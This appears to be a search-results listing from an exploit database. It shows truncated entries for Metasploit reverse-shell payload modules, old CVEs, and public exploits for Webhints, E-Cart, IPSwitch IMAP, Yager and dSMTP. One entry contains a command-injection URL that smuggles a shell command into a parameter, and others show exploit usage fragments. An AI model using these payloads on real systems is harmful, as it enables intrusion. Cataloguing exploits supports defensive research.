6977 matches found
Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
Spawn a piped command shell staged. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 93 include Msf::Payload::Stager include Msf::Payload::Windows def...
Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
Inject the Meterpreter server DLL via the Reflective Dll Injection payload staged. Requires Windows XP SP2 or newer. Connect back to the attacker This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule...
Windows Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 324 include Msf::Payload::Windows include Msf::Payload::Single include...
CVE-2001-1488
Open Projects Network Internet Relay Chat IRC daemon u2.10.05.18 does not perform a double-reverse DNS lookup, which allows remote attackers to spoof any valid hostname on the Internet. NOTE: a followup post suggests that this is not an issue in the daemon...
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)
#!/usr/bin/perl -w emanuele@blackbox:$ perl M4DR007-hints.pl www.madroot.edu.ms Security Group WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: = all code by MadSheep 06.11.2005 hostname: localhost port: default: 80 80 path: /cgi-bin/ /cgi-bin/ your ip for rever...
Webhints 1.03 - Remote Command Execution (Perl) (3)
#!/usr/bin/perl -w emanuele@blackbox:$ perl M4DR007-hints.pl www.madroot.edu.ms Security Group WebHints Software hints.cgi Remote Command Execution Vulnerability Affected version: = all code by MadSheep 06.11.2005 hostname: localhost port: default: 80 80 path: /cgi-bin/ /cgi-bin/ your ip for rever...
IPSwitch IMAP Server - LOGON Remote Stack Overflow
IPSwitch IMAP Server - LOGON Remote Stack Overflow / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because o...
IPSwitch IMAP Server LOGON Remote Stack Overflow
No description provided by source. / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH...
IPSwitch IMAP Server LOGON Remote Stack Overflow
Exploit for unknown platform in category remote exploits ================================================ IPSwitch IMAP Server LOGON Remote Stack Overflow ================================================ / IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written...
IPSwitch IMAP Server - LOGON Remote Stack Overflow
/ IpSwitch IMAP Server LOGON stack overflow. Software Hole discovered by iDEFENSE POC written by nolimit and BuzzDee First, some information for the few of you that know how this stuff works. The reason you see no SP2 or 2003 offsets is because of Windows SEH checks. Thats right, in this one...
yager524.txt
/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...
Exim <= 4.41 dns_build_reverse Local Exploit
No description provided by source. / ripped straight off iDEFENSE advisory - so lazy I just picked up GDB... bored on a weeknight : nothing to write home to mother about due to the fact that you need a local user account on a server and all you get is to read other people's emails .... not even m...
CVE-2005-1613
Cross-site scripting XSS vulnerability in member.php in Open Bulletin Board OpenBB 1.0.8 allows remote attackers to inject arbitrary web script or HTML via the reverse parameter in a list action...
dSMTP Mail Server 3.1b (Linux) - Format String
/ dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit cybertronicatgmxdotnet 05/05/2005 This exploits the "xtellmail" command! bindc0de breaks somehow, cb works fine! remote buffer space is about 256 bytes bad chars: 0x00, 0x20, 0x0a and prolly more NOTE: before you start, chang...
Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow / Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... --...
E-Cart 1.1 - index.cgi Remote Command Execution
E-Cart 1.1 - index.cgi Remote Command Execution !/usr/bin/perl Example added if code doesn't work for ya: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductoresdvd&art=reproductordvp-ns315.dat|uname%20-a| /str0ke info: [email protected] use IO::Socket; print "\n\n www.badroot.org...
Yager <= 5.24 Remote Buffer Overflow Exploit
No description provided by source. / Yager <= 5.24 Remote Buffer Overflow Exploit cybertronicatgmxdotnet 04/25/2005 send all the money to Luigi Auriemma -- exploit by : cybertronic -...
Yager 5.24 - Remote Buffer Overflow
/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...
PMSoftware Simple Web Server - GET Remote Buffer Overflow
PMSoftware Simple Web Server - GET Remote Buffer Overflow / PMSoftware Simple Web Server Buffer Overflow Exploit 3 targets cybertronicatgmxdotnet 04/25/2005 -- exploit by : cybertronic -...